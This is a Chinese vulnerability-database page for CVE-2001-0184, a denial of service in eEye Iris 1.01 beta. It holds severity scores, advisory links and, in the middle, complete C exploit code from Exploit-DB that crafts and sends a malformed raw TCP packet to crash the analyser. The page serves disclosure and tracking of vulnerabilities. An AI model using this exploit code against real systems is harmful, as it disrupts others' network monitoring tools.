CVE-2001-0184
CVSS2.6
发布时间 :2001-03-26 00:00:00
修订时间 :2008-09-05 16:23:28
NMCOES    

[原文]eEye Iris 1.01 beta allows remote attackers to cause a denial of service via a malformed packet, which causes Iris to crash when a user views the packet.


[CNNVD]Iris GET拒绝服务漏洞(CNNVD-200103-086)

        eEye Iris 1.01 beta存在漏洞。远程攻击者可以借助畸形数据包导致服务拒绝,该漏洞还可以在用户浏览数据包时导致Iris崩溃。

- CVSS (基础分值)

CVSS分值: 2.6 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0184
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0184
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-086
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/5981.php
(VENDOR_ADVISORY)  XF  eeye-iris-dos
http://www.securityfocus.com/bid/2278
(VENDOR_ADVISORY)  BID  2278
http://archives.neohapsis.com/archives/bugtraq/2001-01/0352.html
(VENDOR_ADVISORY)  BUGTRAQ  20010121 eEye Iris the Network traffic analyser DoS
http://archives.neohapsis.com/archives/bugtraq/2001-01/0343.html
(UNKNOWN)  BUGTRAQ  20010121 eEye Iris the Network traffic analyser DoS

- 漏洞信息

Iris GET拒绝服务漏洞
低危 其他
2001-03-26 00:00:00 2005-10-20 00:00:00
本地  
        eEye Iris 1.01 beta存在漏洞。远程攻击者可以借助畸形数据包导致服务拒绝,该漏洞还可以在用户浏览数据包时导致Iris崩溃。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this vulnerability. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

- 漏洞信息 (20589)

eEye Digital Security IRIS 1.0.1 GET Denial of Service Vulnerability (EDBID:20589)
windows local
2001-01-21 Verified
0 grazer
N/A [点击下载]
source: http://www.securityfocus.com/bid/2278/info

A maliciously-formed packet sent to Iris by a remote attacker, upon opening in the program for analysis by a user, will cause Iris to terminate.

The crash is caused by an inability of Iris to handle packets with malformed values in its headers. 

/* Denial of Service attack against :
 * Iris The Network Traffic Analyzer beta 1.01
 * ------------------------------------------------
 *
 * Will create an incorrect packet which will cause
 * Iris to hang when it is opened by a user.
 *
 * Vulnerability found by : grazer@digit-labs.org
 * Exploit code by : grazer@digit-labs.org
 *
 * Respect to the guys from eEye, for there fast
 * response.
 *
 * greetings to hit2000, hwa, synnergy, security.is
 *              digit-labs.
 *
 * ---------------> free sk8!!!! <-----------------
 *
 * ------------------------------------------------
 * http://www.digit-labs.org
 *                           grazer@digit-labs.org
 * ------------------------------------------------
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/types.h>
#include <sys/socket.h>

int build_packet(int sfd, u_long srcaddr, u_long dstaddr);

struct pseudo {
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
};

int main(int argc,char **argv){
int rawfd, check, one=1;

struct sockaddr_in raddr;
struct in_addr source_ip, desti_ip;
struct ip *ip;
struct tcphdr *tcp;

        while (argc<3) {
        fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]");
        fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0] );  exit(0);}

        fprintf(stderr, "\nStarting Iris DoS...\n");
        if((check=gethostbyname(argv[2])==NULL)) {
        fprintf(stderr, "\nCannot resolve host %s\n", argv[2]); exit(0); }

        source_ip.s_addr= inet_addr(argv[1]);
        desti_ip.s_addr =       inet_addr(argv[2]);

        if ((rawfd=socket(PF_INET, SOCK_RAW, IPPROTO_TCP))<0) {
        fprintf(stderr, "\n You need root for this..");
        exit(0); }

        setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, 1);

        build_packet(rawfd,source_ip.s_addr, desti_ip.s_addr);

    close(rawfd);
return 1; }


int build_packet(int sfd, u_long srcaddr,  u_long dstaddr) {

u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
struct sockaddr_in sin;
struct in_addr src_inaddr, dest_inaddr;
struct ip *ip = (struct ip *) packet;
struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
+ sizeof(struct pseudo));

        bzero(packet, sizeof(packet));
        bzero(&sin,sizeof(sin));

        src_inaddr.s_addr = srcaddr;
        dest_inaddr.s_addr = dstaddr;

        pseudo->saddr = srcaddr;
        pseudo->daddr = dstaddr;
        pseudo->zero = 1;
        pseudo->protocol=IPPROTO_TCP;
        pseudo->length = htons(sizeof (struct tcphdr));

        ip->ip_v = -1;
        ip->ip_hl = -1;
        ip->ip_id = -1;
        ip->ip_src = src_inaddr;
        ip->ip_dst = dest_inaddr;
        ip->ip_p = IPPROTO_TCP;
        ip->ip_ttl = 40;
        ip->ip_off = -1;
        ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
        tcp->seq = htonl(rand());
        tcp->ack = htonl(rand());

        sin.sin_family=AF_INET;
        sin.sin_addr.s_addr=dstaddr;
        sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0,
        (struct sockaddr *) &sin,sizeof(sin));

        fprintf(stderr, "\n Packet send... \n\n" );

   return 1;}
		

- 漏洞信息

13124
eEye Iris Malformed TCP Packet Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public

- 漏洞描述

- 时间线

2001-01-21 Unknow
2001-01-21 Unknow

- 解决方案

Products

eEye Digital Security

Iris

1.01 beta

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Iris GET Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 2278
No Yes
2001-01-21 12:00:00 2009-07-11 04:46:00
Reported to bugtraq by grazer@digit-labs.org on Sun, 21 Jan 2001

- 受影响的程序版本

eEye Digital Security IRIS 1.0.1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows NT 4.0

- 漏洞讨论

A maliciously-formed packet sent to Iris by a remote attacker, upon opening in the program for analysis by a user, will cause Iris to terminate.

The crash is caused by an inability of Iris to handle packets with malformed values in its headers.

- 漏洞利用

This exploit was supplied by grazer@digit-labs.org.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this vulnerability. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站